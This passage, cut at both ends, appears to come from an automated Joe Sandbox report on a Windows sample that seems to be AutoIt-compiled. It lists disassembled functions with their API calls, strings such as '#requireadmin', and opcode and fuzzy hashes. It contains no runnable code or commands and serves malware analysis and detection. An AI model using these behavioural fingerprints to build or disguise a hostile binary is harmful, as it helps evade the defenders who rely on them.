                                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                        • String ID: \
                                                                        • API String ID: 321622961-2967466578
                                                                        • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                        • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                        Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                        • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                        Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                                        • _wprintf.LIBCMT ref: 004340A1
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                        Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                        • __lock.LIBCMT ref: 00417981
                                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                        • __lock.LIBCMT ref: 004179A2
                                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                        • String ID: KERNEL32.DLL$pI
                                                                        • API String ID: 637971194-197072765
                                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                        Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_malloc
                                                                        • String ID:
                                                                        • API String ID: 1938898002-0
                                                                        • Opcode ID: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                        • Opcode Fuzzy Hash: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                        Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                        • _memmove.LIBCMT ref: 0044B555
                                                                        • _memmove.LIBCMT ref: 0044B578
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                        • String ID:
                                                                        • API String ID: 2737351978-0
                                                                        • Opcode ID: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                        • Opcode Fuzzy Hash: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                        Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                                        • __getptd.LIBCMT ref: 00415253
                                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                        • _free.LIBCMT ref: 0041529E
                                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 3638380555-0
                                                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                        Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 3207048006-625585964
                                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                        Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                        • _memmove.LIBCMT ref: 004656CA
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                        • String ID:
                                                                        • API String ID: 2945290962-0
                                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                        Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                        • String ID:
                                                                        • API String ID: 1457242333-0
                                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                        Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 15295421-0
                                                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                        Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 780548581-3081909835
                                                                        • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                        • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                        Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                        • CloseFigure.GDI32(?), ref: 0044751F
                                                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
